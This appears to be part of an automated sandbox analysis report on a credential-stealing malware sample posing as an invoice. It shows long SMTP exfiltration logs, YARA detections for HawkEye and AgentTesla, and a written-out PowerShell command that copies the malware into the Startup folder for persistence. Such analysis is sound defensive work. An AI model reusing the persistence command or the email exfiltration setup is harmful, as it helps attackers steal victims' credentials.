                                                                                250 STARTTLS
Feb 2, 2021 08:54:24.456887007 CET  49795  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:54:24.646842957 CET  587    49795  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:54:33.747540951 CET  587    49796  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:54:33.748317003 CET  49796  587    192.168.2.7    199.193.7.228  EHLO 830021
Feb 2, 2021 08:54:33.940007925 CET  587    49796  199.193.7.228  192.168.2.7    250-mta-13.privateemail.com
                                                                                250-PIPELINING
                                                                                250-SIZE 81788928
                                                                                250-ETRN
                                                                                250-AUTH PLAIN LOGIN
                                                                                250-ENHANCEDSTATUSCODES
                                                                                250-8BITMIME
                                                                                250 STARTTLS
Feb 2, 2021 08:54:33.940270901 CET  49796  587    192.168.2.7    199.193.7.228  STARTTLS
Feb 2, 2021 08:54:34.130645990 CET  587    49796  199.193.7.228  192.168.2.7    220 Ready to start TLS
Feb 2, 2021 08:54:36.648380041 CET  587    49797  199.193.7.228  192.168.2.7    220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:54:36.648818016 CET  49797  587    192.168.2.7    199.193.7.228  EHLO 830021
                                                                                                  Feb 2, 2021 08:54:36.677932024 CET58749798199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:36.682199955 CET49798587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:36.841758013 CET58749797199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:36.841996908 CET49797587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:36.872733116 CET58749798199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:36.876977921 CET49798587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:37.033971071 CET58749797199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:37.067073107 CET58749798199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:39.379169941 CET58749799199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:39.381690979 CET49799587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:39.572385073 CET58749799199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:39.574527025 CET49799587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:39.766592979 CET58749799199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:41.156644106 CET58749800199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:41.169212103 CET49800587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:41.359941006 CET58749800199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:41.360233068 CET49800587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:41.553025961 CET58749800199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:42.419593096 CET58749801199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:42.420350075 CET49801587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:42.611356974 CET58749801199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:42.611753941 CET49801587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:42.805545092 CET58749801199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:44.273689032 CET58749802199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:44.273976088 CET49802587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:44.478375912 CET58749802199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:44.478852987 CET49802587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:44.680263996 CET58749802199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:49.376130104 CET58749803199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:49.376744032 CET49803587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:49.568742037 CET58749803199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:49.571069002 CET49803587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:49.761332035 CET58749803199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:52.260323048 CET58749804199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:52.260835886 CET49804587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:52.267551899 CET58749805199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:52.269411087 CET49805587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:52.452074051 CET58749804199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:52.452435970 CET49804587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:52.460019112 CET58749805199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:52.460841894 CET49805587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:52.644531012 CET58749804199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:52.653999090 CET58749805199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:54.997694969 CET58749806199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:54.998035908 CET49806587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:55.015147924 CET58749807199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:55.015799999 CET49807587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:55.189517021 CET58749806199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:55.190080881 CET49806587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:55.206698895 CET58749807199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:55.207362890 CET49807587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:55.380321980 CET58749806199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:55.397460938 CET58749807199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:57.700922012 CET58749808199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:57.701092958 CET49808587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:57.870578051 CET58749809199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:57.870820045 CET49809587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:57.894201040 CET58749808199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:57.894429922 CET49808587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:58.062791109 CET58749809199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:58.062974930 CET49809587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:58.086261034 CET58749808199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:58.252882957 CET58749809199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:00.334939957 CET58749810199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:00.336182117 CET49810587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:00.452255964 CET58749811199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:00.452501059 CET49811587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:00.529437065 CET58749810199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:00.529710054 CET49810587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:00.642693043 CET58749811199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:00.642937899 CET49811587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:00.720020056 CET58749810199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:00.833960056 CET58749811199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:03.041965008 CET58749812199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:03.042279005 CET49812587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:03.244170904 CET58749812199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:55:03.246289968 CET49812587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:55:03.447788954 CET58749812199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:55:05.709295034 CET58749813199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:55:05.709516048 CET49813587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:55:05.900187016 CET58749813199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:55:05.900346041 CET | 49813 | 587 | 192.168.2.7 | 199.193.7.228 | STARTTLS
Feb 2, 2021 08:55:06.091825962 CET | 587 | 49813 | 199.193.7.228 | 192.168.2.7 | 220 Ready to start TLS
Feb 2, 2021 08:55:06.739952087 CET | 587 | 49814 | 199.193.7.228 | 192.168.2.7 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:55:06.741314888 CET | 49814 | 587 | 192.168.2.7 | 199.193.7.228 | EHLO 830021
Feb 2, 2021 08:55:06.931937933 CET | 587 | 49814 | 199.193.7.228 | 192.168.2.7 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:55:06.933430910 CET | 49814 | 587 | 192.168.2.7 | 199.193.7.228 | STARTTLS
Feb 2, 2021 08:55:07.123622894 CET | 587 | 49814 | 199.193.7.228 | 192.168.2.7 | 220 Ready to start TLS
Feb 2, 2021 08:55:08.336911917 CET | 587 | 49815 | 199.193.7.228 | 192.168.2.7 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:55:08.337141037 CET | 49815 | 587 | 192.168.2.7 | 199.193.7.228 | EHLO 830021
Feb 2, 2021 08:55:08.527364016 CET | 587 | 49815 | 199.193.7.228 | 192.168.2.7 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:55:08.527591944 CET | 49815 | 587 | 192.168.2.7 | 199.193.7.228 | STARTTLS
Feb 2, 2021 08:55:08.717672110 CET | 587 | 49815 | 199.193.7.228 | 192.168.2.7 | 220 Ready to start TLS
Feb 2, 2021 08:55:09.286880016 CET | 587 | 49816 | 199.193.7.228 | 192.168.2.7 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:55:09.287231922 CET | 49816 | 587 | 192.168.2.7 | 199.193.7.228 | EHLO 830021
Feb 2, 2021 08:55:09.477727890 CET | 587 | 49816 | 199.193.7.228 | 192.168.2.7 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:55:09.480767965 CET | 49816 | 587 | 192.168.2.7 | 199.193.7.228 | STARTTLS
Feb 2, 2021 08:55:09.670908928 CET | 587 | 49816 | 199.193.7.228 | 192.168.2.7 | 220 Ready to start TLS
Feb 2, 2021 08:55:11.825762987 CET | 587 | 49817 | 199.193.7.228 | 192.168.2.7 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:55:11.826100111 CET | 49817 | 587 | 192.168.2.7 | 199.193.7.228 | EHLO 830021
Feb 2, 2021 08:55:11.842029095 CET | 587 | 49818 | 199.193.7.228 | 192.168.2.7 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:55:11.842259884 CET | 49818 | 587 | 192.168.2.7 | 199.193.7.228 | EHLO 830021
Feb 2, 2021 08:55:12.016412973 CET | 587 | 49817 | 199.193.7.228 | 192.168.2.7 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:55:12.016590118 CET | 49817 | 587 | 192.168.2.7 | 199.193.7.228 | STARTTLS
Feb 2, 2021 08:55:12.033821106 CET | 587 | 49818 | 199.193.7.228 | 192.168.2.7 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:55:12.034054995 CET | 49818 | 587 | 192.168.2.7 | 199.193.7.228 | STARTTLS
Feb 2, 2021 08:55:12.209115982 CET | 587 | 49817 | 199.193.7.228 | 192.168.2.7 | 220 Ready to start TLS
Feb 2, 2021 08:55:12.227118015 CET | 587 | 49818 | 199.193.7.228 | 192.168.2.7 | 220 Ready to start TLS
Feb 2, 2021 08:55:14.469098091 CET | 587 | 49819 | 199.193.7.228 | 192.168.2.7 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:55:14.469307899 CET | 49819 | 587 | 192.168.2.7 | 199.193.7.228 | EHLO 830021
Feb 2, 2021 08:55:14.670991898 CET | 587 | 49819 | 199.193.7.228 | 192.168.2.7 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:55:14.671222925 CET | 49819 | 587 | 192.168.2.7 | 199.193.7.228 | STARTTLS
Feb 2, 2021 08:55:14.748943090 CET | 587 | 49820 | 199.193.7.228 | 192.168.2.7 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:55:14.749162912 CET | 49820 | 587 | 192.168.2.7 | 199.193.7.228 | EHLO 830021
Feb 2, 2021 08:55:14.872647047 CET | 587 | 49819 | 199.193.7.228 | 192.168.2.7 | 220 Ready to start TLS
Feb 2, 2021 08:55:14.939352989 CET | 587 | 49820 | 199.193.7.228 | 192.168.2.7 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:55:14.939585924 CET | 49820 | 587 | 192.168.2.7 | 199.193.7.228 | STARTTLS
Feb 2, 2021 08:55:15.129380941 CET | 587 | 49820 | 199.193.7.228 | 192.168.2.7 | 220 Ready to start TLS
Feb 2, 2021 08:55:17.125241041 CET | 587 | 49821 | 199.193.7.228 | 192.168.2.7 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:55:17.125453949 CET | 49821 | 587 | 192.168.2.7 | 199.193.7.228 | EHLO 830021
Feb 2, 2021 08:55:17.282188892 CET | 587 | 49822 | 199.193.7.228 | 192.168.2.7 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:55:17.282394886 CET | 49822 | 587 | 192.168.2.7 | 199.193.7.228 | EHLO 830021
Feb 2, 2021 08:55:17.316113949 CET | 587 | 49821 | 199.193.7.228 | 192.168.2.7 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:55:17.316272974 CET | 49821 | 587 | 192.168.2.7 | 199.193.7.228 | STARTTLS
Feb 2, 2021 08:55:17.472850084 CET | 587 | 49822 | 199.193.7.228 | 192.168.2.7 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:55:17.473069906 CET | 49822 | 587 | 192.168.2.7 | 199.193.7.228 | STARTTLS
Feb 2, 2021 08:55:17.506520987 CET | 587 | 49821 | 199.193.7.228 | 192.168.2.7 | 220 Ready to start TLS
Feb 2, 2021 08:55:17.663238049 CET | 587 | 49822 | 199.193.7.228 | 192.168.2.7 | 220 Ready to start TLS
Feb 2, 2021 08:55:19.663860083 CET | 587 | 49823 | 199.193.7.228 | 192.168.2.7 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:55:19.664026976 CET | 49823 | 587 | 192.168.2.7 | 199.193.7.228 | EHLO 830021
Feb 2, 2021 08:55:19.854288101 CET | 587 | 49823 | 199.193.7.228 | 192.168.2.7 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:55:19.854476929 CET | 49823 | 587 | 192.168.2.7 | 199.193.7.228 | STARTTLS
Feb 2, 2021 08:55:19.863238096 CET | 587 | 49824 | 199.193.7.228 | 192.168.2.7 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:55:19.863399982 CET | 49824 | 587 | 192.168.2.7 | 199.193.7.228 | EHLO 830021
Feb 2, 2021 08:55:20.047234058 CET | 587 | 49823 | 199.193.7.228 | 192.168.2.7 | 220 Ready to start TLS
Feb 2, 2021 08:55:20.067862034 CET | 587 | 49824 | 199.193.7.228 | 192.168.2.7 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:55:20.068080902 CET | 49824 | 587 | 192.168.2.7 | 199.193.7.228 | STARTTLS
Feb 2, 2021 08:55:20.271485090 CET | 587 | 49824 | 199.193.7.228 | 192.168.2.7 | 220 Ready to start TLS
Feb 2, 2021 08:55:24.527071953 CET | 587 | 49825 | 199.193.7.228 | 192.168.2.7 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:55:24.527304888 CET | 49825 | 587 | 192.168.2.7 | 199.193.7.228 | EHLO 830021

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 08:51:34
Start date: 02/02/2021
Path: C:\Users\user\Desktop\PO_Invoices_pdf.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\PO_Invoices_pdf.exe'
Imagebase: 0xaf0000
File size: 1655808 bytes
MD5 hash: 59D7D8D5DD3E0055E7C0DCC75897F569
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 08:51:44
Start date: 02/02/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'
Imagebase: 0x13c0000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 08:51:44
Start date: 02/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff774ee0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:51:45
Start date: 02/02/2021
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase: 0xb60000
File size: 64616 bytes
MD5 hash: 6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Visual Basic
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.273863512.0000000003E4D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.285132773.0000000003DE1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.269169616.00000000010E3000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.272090410.0000000003B4B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.276618597.0000000003B4B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.286093751.00000000010E3000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000003.284634932.0000000003E4D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
